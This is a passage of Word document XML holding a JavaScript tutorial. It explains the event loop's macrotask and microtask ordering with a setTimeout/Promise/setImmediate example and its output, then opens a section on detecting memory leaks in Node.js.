        <w:t>Microtasks are executed after the currently executing script (macrotask) and before the event loop processes the next macrotask.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F21436" w14:textId="77777777" w:rsidR="009D461B" w:rsidRPr="00DA2F32" w:rsidRDefault="009D461B" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Task Execution Order</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FE3082" w14:textId="77777777" w:rsidR="009D461B" w:rsidRPr="00DA2F32" w:rsidRDefault="009D461B" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="250"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Execute Macrotask</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Pick the first task from the macrotask queue and execute it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6397E3B6" w14:textId="77777777" w:rsidR="009D461B" w:rsidRPr="00DA2F32" w:rsidRDefault="009D461B" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="250"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Execute Microtasks</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: After a macrotask is completed, execute all the microtasks in the microtask queue. This continues until the microtask queue is empty.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550799F4" w14:textId="77777777" w:rsidR="009D461B" w:rsidRPr="00DA2F32" w:rsidRDefault="009D461B" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="250"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Render</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: In browsers, after microtasks are processed, a render cycle might occur if needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FAA0181" w14:textId="77777777" w:rsidR="009D461B" w:rsidRPr="00DA2F32" w:rsidRDefault="009D461B" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="250"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Next Macrotask</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Continue to the next macrotask.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58087FDD" w14:textId="77777777" w:rsidR="009D461B" w:rsidRPr="00DA2F32" w:rsidRDefault="009D461B"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591E1E7F"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Consider the following example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BEDC81"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console.log('Start');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1DEF2C" w14:textId="77777777" w:rsidR="009D461B" w:rsidRPr="00DA2F32" w:rsidRDefault="009D461B" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="206D2834"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Macrotask: setTimeout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16AC15BB"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setTimeout(() =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CA5B4F"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console.log('Macrotask: setTimeout');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081DBE45"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0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78190500" w14:textId="77777777" w:rsidR="009D461B" w:rsidRPr="00DA2F32" w:rsidRDefault="009D461B" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72E1CA15"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Microtask: Promise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1275D9"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Promise.resolve().then(() =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3FE729"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console.log('Microtask: Promise');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24940E3A"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EF28423" w14:textId="77777777" w:rsidR="009D461B" w:rsidRPr="00DA2F32" w:rsidRDefault="009D461B" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18C40DFB"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Another Macrotask: setImmediate (Node.js only)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345912CD"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setImmediate(() =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58331A4A"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console.log('Macrotask: setImmediate');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B845E3A" w14:textId="77777777" w:rsidR="009D461B" w:rsidRPr="00DA2F32" w:rsidRDefault="009D461B"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01FACA3" w14:textId="77777777" w:rsidR="009D461B" w:rsidRPr="00DA2F32" w:rsidRDefault="009D461B" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A2ED3B0" w14:textId="77777777" w:rsidR="009D461B" w:rsidRPr="00DA2F32" w:rsidRDefault="009D461B"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console.log('End');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317BE50C"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b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Output</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6936F331"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1C95EF"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>End</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB0EAAE"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Microtask: Promise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712814F6"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Macrotask: setTimeout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B91608" w14:textId="77777777" w:rsidR="009D461B" w:rsidRPr="00DA2F32" w:rsidRDefault="009D461B" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Macrotask: setImmediate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8F03B4" w14:textId="77777777" w:rsidR="009D461B" w:rsidRPr="00DA2F32" w:rsidRDefault="009D461B" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Explanation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558DDF37" w14:textId="77777777" w:rsidR="009D461B" w:rsidRPr="00DA2F32" w:rsidRDefault="009D461B" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="251"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Synchronous Code Execution</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: console.log('Start') and console.log('End') are executed first.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB91E1E" w14:textId="77777777" w:rsidR="009D461B" w:rsidRPr="00DA2F32" w:rsidRDefault="009D461B" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="251"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Macrotask Queue</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC53645" w14:textId="77777777" w:rsidR="009D461B" w:rsidRPr="00DA2F32" w:rsidRDefault="009D461B" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="251"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>setTimeout schedules a macrotask.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EBFD8F2" w14:textId="77777777" w:rsidR="009D461B" w:rsidRPr="00DA2F32" w:rsidRDefault="009D461B" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="251"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>setImmediate (in Node.js) schedules another macrotask.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F29AA0" w14:textId="77777777" w:rsidR="009D461B" w:rsidRPr="00DA2F32" w:rsidRDefault="009D461B" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="251"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Microtask Queue</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6622B660" w14:textId="77777777" w:rsidR="009D461B" w:rsidRPr="00DA2F32" w:rsidRDefault="009D461B" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="251"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>The Promise resolves and its callback is added to the microtask queue.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBB814D" w14:textId="77777777" w:rsidR="009D461B" w:rsidRPr="00DA2F32" w:rsidRDefault="009D461B" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="251"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Event Loop Processing</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205C4D8D" w14:textId="77777777" w:rsidR="009D461B" w:rsidRPr="00DA2F32" w:rsidRDefault="009D461B" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="251"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>The event loop processes the Promise microtask first.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1017E741" w14:textId="77777777" w:rsidR="009D461B" w:rsidRPr="00DA2F32" w:rsidRDefault="009D461B" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="251"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Then it processes the setTimeout macrotask.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000F519A" w14:textId="77777777" w:rsidR="009D461B" w:rsidRPr="00DA2F32" w:rsidRDefault="009D461B" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="251"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Finally, it processes the setImmediate macrotask.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569C6351" w14:textId="77777777" w:rsidR="00665E4E" w:rsidRPr="00DA2F32" w:rsidRDefault="00665E4E" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="551B8705" w14:textId="0C259000" w:rsidR="00BB2F17" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="87" w:name="_Toc178383270"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Memory Management</w:t>
      </w:r>
      <w:bookmarkEnd w:id="87"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0770D775" w14:textId="5ABE348A" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="88" w:name="_Toc178383271"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>What is a memory leak and how to detect and diagnose it.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="88"/>
    </w:p>
    <w:p w14:paraId="54D6433D" w14:textId="77777777" w:rsidR="00172E43" w:rsidRPr="00DA2F32" w:rsidRDefault="00172E43" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>memory leak</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> occurs when a program retains memory it no longer needs, leading to increased memory usage over time. In Node.js and JavaScript, memory leaks can degrade performance, eventually causing your application to run out of memory. Detecting and diagnosing memory leaks is crucial for maintaining the health of your application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADE63D6"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rPr>
        <w:t>Common Causes of Memory Leaks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A8D912" w14:textId="77777777" w:rsidR="00172E43" w:rsidRPr="00DA2F32" w:rsidRDefault="00172E43" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="252"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Global Variables</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Unintentional global variables can lead to memory leaks if they hold references to large data structures or objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689C3039" w14:textId="77777777" w:rsidR="00172E43" w:rsidRPr="00DA2F32" w:rsidRDefault="00172E43" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="252"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Uncleared Timers and Intervals</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Using setInterval or setTimeout without clearing them can cause memory leaks if they keep references to objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF2ECC0" w14:textId="77777777" w:rsidR="00172E43" w:rsidRPr="00DA2F32" w:rsidRDefault="00172E43" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="252"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
